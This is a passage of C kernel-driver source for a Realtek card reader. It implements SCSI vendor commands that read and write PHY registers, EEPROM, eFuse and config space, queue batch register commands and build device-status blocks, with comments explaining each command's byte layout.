	rtsx_set_stat(chip, RTSX_STAT_RUN);

	len = ((u16)(srb->cmnd[4]) << 8) | srb->cmnd[5];
	/* Never transfer more than the host buffer holds */
	len = min(len, (u16)scsi_bufflen(srb));

	if (srb->sc_data_direction == DMA_FROM_DEVICE) {
		RTSX_DEBUGP("Read from device\n");
	} else {
		RTSX_DEBUGP("Write to device\n");
	}

	retval = rtsx_transfer_data(chip, 0, scsi_sglist(srb), len,
			scsi_sg_count(srb), srb->sc_data_direction, 1000);
	if (retval < 0) {
		if (srb->sc_data_direction == DMA_FROM_DEVICE) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		} else {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
		}
		TRACE_RET(chip, TRANSPORT_FAILED);
	}
	scsi_set_resid(srb, 0);

	return TRANSPORT_GOOD;
}
/*
 * GET_DEV_STATUS vendor command: fill a 32-byte status block describing
 * the chip and the card in this LUN and copy it to the host.
 *
 * Fields visible from this code: [0] product id (low byte), [1] IC
 * version, [2] auto-delink flag, [3..6] fixed protocol constants,
 * [7] write-protect bit 5 (and SD-lock bit 6), [8] over-current status,
 * [0x0E]/[0x0F] card capacity class / speed class, [0x17] SD lock
 * status, [0x18]/[0x1A] fixed, [0x1F] SD-lock support marker.  Exact
 * field semantics belong to the vendor tool protocol — not all are
 * derivable from this file.
 *
 * Fix: status[5] used the octal literal 05 (== 5) amid decimal
 * constants; written as plain 5 now.  Behavior is unchanged.
 */
static int get_dev_status(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	struct sd_info *sd_card = &(chip->sd_card);
	struct ms_info *ms_card = &(chip->ms_card);
	int buf_len;
	unsigned int lun = SCSI_LUN(srb);
	u8 card = get_lun_card(chip, lun);
	u8 status[32];
#ifdef SUPPORT_OCP
	u8 oc_now_mask = 0, oc_ever_mask = 0;
#endif

	memset(status, 0, 32);

	status[0] = (u8)(chip->product_id);
	status[1] = chip->ic_version;

	if (chip->auto_delink_en) {
		status[2] = 0x10;
	} else {
		status[2] = 0x00;
	}

	/* Fixed protocol constants (presumably a version stamp — TODO
	 * confirm against the vendor tool spec) */
	status[3] = 20;
	status[4] = 10;
	status[5] = 5;
	status[6] = 21;

	if (chip->card_wp) {
		status[7] = 0x20;
	} else {
		status[7] = 0x00;
	}

#ifdef SUPPORT_OCP
	status[8] = 0;
	/* Pick the over-current bits matching the card type on this LUN */
	if (CHECK_LUN_MODE(chip, SD_MS_2LUN) && (chip->lun2card[lun] == MS_CARD)) {
		oc_now_mask = MS_OC_NOW;
		oc_ever_mask = MS_OC_EVER;
	} else {
		oc_now_mask = SD_OC_NOW;
		oc_ever_mask = SD_OC_EVER;
	}

	if (chip->ocp_stat & oc_now_mask) {
		status[8] |= 0x02;
	}
	if (chip->ocp_stat & oc_ever_mask) {
		status[8] |= 0x01;
	}
#endif

	if (card == SD_CARD) {
		if (CHK_SD(sd_card)) {
			/* SD: 0x0E = capacity class, 0x0F = speed class */
			if (CHK_SD_HCXC(sd_card)) {
				if (sd_card->capacity > 0x4000000) {
					status[0x0E] = 0x02;
				} else {
					status[0x0E] = 0x01;
				}
			} else {
				status[0x0E] = 0x00;
			}

			if (CHK_SD_SDR104(sd_card)) {
				status[0x0F] = 0x03;
			} else if (CHK_SD_DDR50(sd_card)) {
				status[0x0F] = 0x04;
			} else if (CHK_SD_SDR50(sd_card)) {
				status[0x0F] = 0x02;
			} else if (CHK_SD_HS(sd_card)) {
				status[0x0F] = 0x01;
			} else {
				status[0x0F] = 0x00;
			}
		} else {
			/* MMC variant of the same two fields */
			if (CHK_MMC_SECTOR_MODE(sd_card)) {
				status[0x0E] = 0x01;
			} else {
				status[0x0E] = 0x00;
			}

			if (CHK_MMC_DDR52(sd_card)) {
				status[0x0F] = 0x03;
			} else if (CHK_MMC_52M(sd_card)) {
				status[0x0F] = 0x02;
			} else if (CHK_MMC_26M(sd_card)) {
				status[0x0F] = 0x01;
			} else {
				status[0x0F] = 0x00;
			}
		}
	} else if (card == MS_CARD) {
		if (CHK_MSPRO(ms_card)) {
			if (CHK_MSXC(ms_card)) {
				status[0x0E] = 0x01;
			} else {
				status[0x0E] = 0x00;
			}

			if (CHK_HG8BIT(ms_card)) {
				status[0x0F] = 0x01;
			} else {
				status[0x0F] = 0x00;
			}
		}
	}

#ifdef SUPPORT_SD_LOCK
	if (card == SD_CARD) {
		status[0x17] = 0x80;
		if (sd_card->sd_erase_status)
			status[0x17] |= 0x01;
		if (sd_card->sd_lock_status & SD_LOCKED) {
			status[0x17] |= 0x02;
			status[0x07] |= 0x40;
		}
		if (sd_card->sd_lock_status & SD_PWD_EXIST)
			status[0x17] |= 0x04;
	} else {
		status[0x17] = 0x00;
	}

	RTSX_DEBUGP("status[0x17] = 0x%x\n", status[0x17]);
#endif

	status[0x18] = 0x8A;
	status[0x1A] = 0x28;

#ifdef SUPPORT_SD_LOCK
	status[0x1F] = 0x01;
#endif

	buf_len = min(scsi_bufflen(srb), (unsigned int)sizeof(status));
	rtsx_stor_set_xfer_buf(status, buf_len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - buf_len);

	return TRANSPORT_GOOD;
}
/*
 * SET_CHIP_MODE vendor command (RTS5208 only): enter or leave "PHY
 * debug mode" as selected by cmnd[3].
 *
 * Entering disables card-detect resume (CDRESUMECTL), masks bus
 * interrupts, and sets bit 0 of PHY register 0x1C; leaving reverses
 * all three steps.
 */
static int set_chip_mode(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int phy_debug_mode;
	int retval;
	u16 reg;

	/* Only the RTS5208 supports this command */
	if (!CHECK_PID(chip, 0x5208)) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	phy_debug_mode = (int)(srb->cmnd[3]);

	if (phy_debug_mode) {
		chip->phy_debug_mode = 1;
		retval = rtsx_write_register(chip, CDRESUMECTL, 0x77, 0);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		rtsx_disable_bus_int(chip);

		/* Set bit 0 of PHY reg 0x1C (debug enable — semantics per
		 * the PHY datasheet, not visible here) */
		retval = rtsx_read_phy_register(chip, 0x1C, &reg);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		reg |= 0x0001;
		retval = rtsx_write_phy_register(chip, 0x1C, reg);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	} else {
		chip->phy_debug_mode = 0;
		retval = rtsx_write_register(chip, CDRESUMECTL, 0x77, 0x77);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		rtsx_enable_bus_int(chip);

		/* Clear bit 0 of PHY reg 0x1C again */
		retval = rtsx_read_phy_register(chip, 0x1C, &reg);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		reg &= 0xFFFE;
		retval = rtsx_write_phy_register(chip, 0x1C, reg);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	return TRANSPORT_GOOD;
}
/*
 * Batch register-command interface (backs the SUIT_CMD sub-ops):
 *   INIT_BATCHCMD - reset the chip's internal command queue
 *   ADD_BATCHCMD  - append one command: type cmnd[4] (0..2), register
 *                   address cmnd[5..6], mask cmnd[7], value cmnd[8]
 *   SEND_BATCHCMD - issue the queued commands (1 s timeout)
 *   GET_BATCHRSP  - return response byte cmnd[4] from the result buffer
 */
static int rw_mem_cmd_buf(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int retval = STATUS_SUCCESS;
	unsigned int lun = SCSI_LUN(srb);
	u8 cmd_type, mask, value, idx;
	u16 addr;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	switch (srb->cmnd[3]) {
	case INIT_BATCHCMD:
		rtsx_init_cmd(chip);
		break;

	case ADD_BATCHCMD:
		cmd_type = srb->cmnd[4];
		/* Only command types 0..2 are defined */
		if (cmd_type > 2) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		addr = (srb->cmnd[5] << 8) | srb->cmnd[6];
		mask = srb->cmnd[7];
		value = srb->cmnd[8];
		rtsx_add_cmd(chip, cmd_type, addr, mask, value);
		break;

	case SEND_BATCHCMD:
		retval = rtsx_send_cmd(chip, 0, 1000);
		break;

	case GET_BATCHRSP:
		idx = srb->cmnd[4];
		value = *(rtsx_get_cmd_data(chip) + idx);
		if (scsi_bufflen(srb) < 1) {
			set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
		rtsx_stor_set_xfer_buf(&value, 1, srb);
		scsi_set_resid(srb, 0);
		break;

	default:
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	/* Only SEND_BATCHCMD can change retval; report its failure */
	if (retval != STATUS_SUCCESS) {
		set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return TRANSPORT_GOOD;
}
static int suit_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int result;
switch (srb->cmnd[3]) {
case INIT_BATCHCMD:
case ADD_BATCHCMD:
case SEND_BATCHCMD:
case GET_BATCHRSP:
result = rw_mem_cmd_buf(srb, chip);
break;
default:
result = TRANSPORT_ERROR;
}
return result;
}
/*
 * READ_PHY vendor command: read a run of 16-bit PHY registers starting
 * at cmnd[4..5] and return them big-endian.  cmnd[6..7] is the byte
 * length; odd lengths are rounded down since PHY registers are 16-bit.
 * A length of zero is a no-op success.
 */
static int read_phy_register(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short addr, len, i;
	int retval;
	u8 *buf;
	u16 val;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
	len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];

	/* PHY registers are 16 bits wide: force an even byte count */
	if (len % 2)
		len -= len % 2;

	if (len) {
		buf = (u8 *)vmalloc(len);
		if (!buf) {
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		retval = rtsx_force_power_on(chip, SSC_PDCTL);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		for (i = 0; i < len / 2; i++) {
			retval = rtsx_read_phy_register(chip, addr + i, &val);
			if (retval != STATUS_SUCCESS) {
				vfree(buf);
				set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
				TRACE_RET(chip, TRANSPORT_FAILED);
			}

			/* Big-endian: high byte first */
			buf[2*i] = (u8)(val >> 8);
			buf[2*i+1] = (u8)val;
		}

		len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
		rtsx_stor_set_xfer_buf(buf, len, srb);
		scsi_set_resid(srb, scsi_bufflen(srb) - len);

		vfree(buf);
	}

	return TRANSPORT_GOOD;
}
/*
 * WRITE_PHY vendor command: write a run of 16-bit PHY registers
 * starting at cmnd[4..5] from big-endian data in the host buffer.
 * cmnd[6..7] is the byte length; odd lengths are rounded down.
 * A length of zero is a no-op success.
 */
static int write_phy_register(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short addr, len, i;
	int retval;
	u8 *buf;
	u16 val;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
	len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];

	/* PHY registers are 16 bits wide: force an even byte count */
	if (len % 2)
		len -= len % 2;

	if (len) {
		len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);

		buf = (u8 *)vmalloc(len);
		if (buf == NULL) {
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		rtsx_stor_get_xfer_buf(buf, len, srb);
		scsi_set_resid(srb, scsi_bufflen(srb) - len);

		retval = rtsx_force_power_on(chip, SSC_PDCTL);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}

		for (i = 0; i < len / 2; i++) {
			/* Reassemble big-endian 16-bit value from the buffer */
			val = ((u16)buf[2*i] << 8) | buf[2*i+1];
			retval = rtsx_write_phy_register(chip, addr + i, val);
			if (retval != STATUS_SUCCESS) {
				vfree(buf);
				set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
				TRACE_RET(chip, TRANSPORT_FAILED);
			}
		}

		vfree(buf);
	}

	return TRANSPORT_GOOD;
}
/*
 * ERASE_EEPROM2 vendor command: erase the SPI EEPROM.
 * cmnd[3] selects the mode: 0 = erase the whole chip,
 * 1 = erase the single byte at address cmnd[4..5].
 */
static int erase_eeprom2(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short addr;
	int retval;
	u8 mode;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	mode = srb->cmnd[3];
	addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];

	if (mode == 0) {
		/* Whole-chip erase */
		retval = spi_erase_eeprom_chip(chip);
		if (retval != STATUS_SUCCESS) {
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	} else if (mode == 1) {
		/* Single-byte erase */
		retval = spi_erase_eeprom_byte(chip, addr);
		if (retval != STATUS_SUCCESS) {
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	} else {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return TRANSPORT_GOOD;
}
/*
 * READ_EEPROM2 vendor command: read cmnd[6..7] (big-endian) bytes from
 * the SPI EEPROM starting at address cmnd[4..5], one byte at a time,
 * and return them to the host (clamped to the SCSI buffer length).
 */
static int read_eeprom2(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short addr, len, i;
	int retval;
	u8 *buf;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
	len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];

	buf = (u8 *)vmalloc(len);
	if (!buf) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		vfree(buf);
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	for (i = 0; i < len; i++) {
		retval = spi_read_eeprom(chip, addr + i, buf + i);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
	rtsx_stor_set_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	vfree(buf);
	return TRANSPORT_GOOD;
}
/*
 * WRITE_EEPROM2 vendor command: write host-supplied data to the SPI
 * EEPROM starting at address cmnd[4..5].  cmnd[6..7] is the length,
 * clamped to the SCSI buffer size; bytes are programmed one at a time.
 */
static int write_eeprom2(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	unsigned short addr, len, i;
	int retval;
	u8 *buf;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
	len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];

	len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
	buf = (u8 *)vmalloc(len);
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	rtsx_stor_get_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		vfree(buf);
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	for (i = 0; i < len; i++) {
		retval = spi_write_eeprom(chip, addr + i, buf[i]);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	vfree(buf);
	return TRANSPORT_GOOD;
}
/*
 * READ_EFUSE vendor command: read cmnd[5] bytes of the chip's eFuse
 * array starting at offset cmnd[4], one byte at a time, and return them
 * to the host (clamped to the SCSI buffer length).
 */
static int read_efuse(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int retval;
	u8 addr, len, i;
	u8 *buf;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = srb->cmnd[4];
	len = srb->cmnd[5];

	buf = (u8 *)vmalloc(len);
	if (!buf) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		vfree(buf);
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	for (i = 0; i < len; i++) {
		retval = rtsx_read_efuse(chip, addr + i, buf + i);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
			TRACE_RET(chip, TRANSPORT_FAILED);
		}
	}

	len = (u8)min(scsi_bufflen(srb), (unsigned int)len);
	rtsx_stor_set_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	vfree(buf);
	return TRANSPORT_GOOD;
}
/*
 * WRITE_EFUSE vendor command: program cmnd[5] bytes into the eFuse
 * array at offset cmnd[4].
 *
 * On ASIC silicon the programming needs a special supply sequence:
 * save PHY register 0x08, drop LDO3318, set the programming voltage
 * (0x4C00 | chip->phy_voltage — exact field meaning per the PHY
 * datasheet, not visible here), re-enable the LDO, then power the SPI
 * rail.  After programming (or on a per-byte failure, via TRACE_GOTO)
 * the Exit path powers the rail down and restores the saved PHY value.
 */
static int write_efuse(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int retval, result = TRANSPORT_GOOD;
	u16 val;
	u8 addr, len, i;
	u8 *buf;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	addr = srb->cmnd[4];
	len = srb->cmnd[5];

	len = (u8)min(scsi_bufflen(srb), (unsigned int)len);
	buf = (u8 *)vmalloc(len);
	if (buf == NULL) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	rtsx_stor_get_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	retval = rtsx_force_power_on(chip, SSC_PDCTL);
	if (retval != STATUS_SUCCESS) {
		vfree(buf);
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	if (chip->asic_code) {
		/* Save PHY reg 0x08 so it can be restored after programming */
		retval = rtsx_read_phy_register(chip, 0x08, &val);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_OFF);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		wait_timeout(600);

		/* Apply the eFuse programming voltage */
		retval = rtsx_write_phy_register(chip, 0x08, 0x4C00 | chip->phy_voltage);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_ON);
		if (retval != STATUS_SUCCESS) {
			vfree(buf);
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		wait_timeout(600);
	}

	retval = card_power_on(chip, SPI_CARD);
	if (retval != STATUS_SUCCESS) {
		vfree(buf);
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	wait_timeout(50);

	for (i = 0; i < len; i++) {
		retval = rtsx_write_efuse(chip, addr + i, buf[i]);
		if (retval != STATUS_SUCCESS) {
			set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
			result = TRANSPORT_FAILED;
			/* Still run the power-down/restore sequence below */
			TRACE_GOTO(chip, Exit);
		}
	}

Exit:
	vfree(buf);

	retval = card_power_off(chip, SPI_CARD);
	if (retval != STATUS_SUCCESS) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	if (chip->asic_code) {
		/* Undo the programming-voltage sequence and restore 0x08 */
		retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_OFF);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		wait_timeout(600);

		retval = rtsx_write_phy_register(chip, 0x08, val);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_ERROR);
		}

		retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_ON);
		if (retval != STATUS_SUCCESS) {
			TRACE_RET(chip, TRANSPORT_ERROR);
		}
	}

	return result;
}
/*
 * READ_CFG vendor command: read cmnd[6..7] (big-endian) bytes of config
 * space for function cmnd[3], starting at offset cmnd[4..5].  Function
 * 1 is only valid when an SDIO function exists and is not ignored.
 */
static int read_cfg_byte(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int retval;
	u8 func, func_max;
	u16 addr, len;
	u8 *buf;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	func = srb->cmnd[3];
	addr = ((u16)(srb->cmnd[4]) << 8) | srb->cmnd[5];
	len = ((u16)(srb->cmnd[6]) << 8) | srb->cmnd[7];

	RTSX_DEBUGP("%s: func = %d, addr = 0x%x, len = %d\n", __func__, func, addr, len);

	if (CHK_SDIO_EXIST(chip) && !CHK_SDIO_IGNORED(chip)) {
		func_max = 1;
	} else {
		func_max = 0;
	}

	if (func > func_max) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	buf = (u8 *)vmalloc(len);
	if (!buf) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	retval = rtsx_read_cfg_seq(chip, func, addr, buf, len);
	if (retval != STATUS_SUCCESS) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
		vfree(buf);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	len = (u16)min(scsi_bufflen(srb), (unsigned int)len);
	rtsx_stor_set_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	vfree(buf);
	return TRANSPORT_GOOD;
}
/*
 * WRITE_CFG vendor command: write host-supplied data into config space
 * for function cmnd[3], starting at offset cmnd[4..5].  cmnd[6..7] is
 * the length, clamped to the SCSI buffer size.  Function 1 is only
 * valid when an SDIO function exists and is not ignored.
 */
static int write_cfg_byte(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int retval;
	u8 func, func_max;
	u16 addr, len;
	u8 *buf;

	rtsx_disable_aspm(chip);

	if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
		rtsx_exit_ss(chip);
		wait_timeout(100);
	}
	rtsx_set_stat(chip, RTSX_STAT_RUN);

	func = srb->cmnd[3];
	addr = ((u16)(srb->cmnd[4]) << 8) | srb->cmnd[5];
	len = ((u16)(srb->cmnd[6]) << 8) | srb->cmnd[7];

	RTSX_DEBUGP("%s: func = %d, addr = 0x%x\n", __func__, func, addr);

	if (CHK_SDIO_EXIST(chip) && !CHK_SDIO_IGNORED(chip)) {
		func_max = 1;
	} else {
		func_max = 0;
	}

	if (func > func_max) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
	buf = (u8 *)vmalloc(len);
	if (!buf) {
		TRACE_RET(chip, TRANSPORT_ERROR);
	}

	rtsx_stor_get_xfer_buf(buf, len, srb);
	scsi_set_resid(srb, scsi_bufflen(srb) - len);

	retval = rtsx_write_cfg_seq(chip, func, addr, buf, len);
	if (retval != STATUS_SUCCESS) {
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
		vfree(buf);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	vfree(buf);
	return TRANSPORT_GOOD;
}
/*
 * SCSI_APP_CMD dispatcher: route the sub-opcode in cmnd[2] to its
 * handler.  Unknown sub-opcodes fail with "invalid field in CDB".
 */
static int app_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
	int result;

	switch (srb->cmnd[2]) {
	case PP_READ10:
	case PP_WRITE10:
		result = read_write(srb, chip);
		break;

	case READ_HOST_REG:
		result = read_host_reg(srb, chip);
		break;

	case WRITE_HOST_REG:
		result = write_host_reg(srb, chip);
		break;

	case GET_VAR:
		result = get_variable(srb, chip);
		break;

	case SET_VAR:
		result = set_variable(srb, chip);
		break;

	case DMA_READ:
	case DMA_WRITE:
		result = dma_access_ring_buffer(srb, chip);
		break;

	case READ_PHY:
		result = read_phy_register(srb, chip);
		break;

	case WRITE_PHY:
		result = write_phy_register(srb, chip);
		break;

	case ERASE_EEPROM2:
		result = erase_eeprom2(srb, chip);
		break;

	case READ_EEPROM2:
		result = read_eeprom2(srb, chip);
		break;

	case WRITE_EEPROM2:
		result = write_eeprom2(srb, chip);
		break;

	case READ_EFUSE:
		result = read_efuse(srb, chip);
		break;

	case WRITE_EFUSE:
		result = write_efuse(srb, chip);
		break;

	case READ_CFG:
		result = read_cfg_byte(srb, chip);
		break;

	case WRITE_CFG:
		result = write_cfg_byte(srb, chip);
		break;

	case SET_CHIP_MODE:
		result = set_chip_mode(srb, chip);
		break;

	case SUIT_CMD:
		result = suit_cmd(srb, chip);
		break;

	case GET_DEV_STATUS:
		result = get_dev_status(srb, chip);
		break;

	default:
		set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
		TRACE_RET(chip, TRANSPORT_FAILED);
	}

	return result;
}
/*
 * READ_STATUS vendor command: build a 16-byte driver/card status block.
 *
 * Layout (as built below): [0..1] vendor id, [2..3] product id (both
 * big-endian), [4] LUN, [5] current card-type code (2=SD, 3=MS, 4=XD,
 * 7=none), [6] LUN count, [7] product id low byte, [8] IC version,
 * [9] card-exist flag, [10] single-LUN flag, [11] supported-card mask,
 * [12] card-ready flag, [13] detailed card capability bits,
 * [14..15] fixed protocol constants.
 */
static int read_status(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
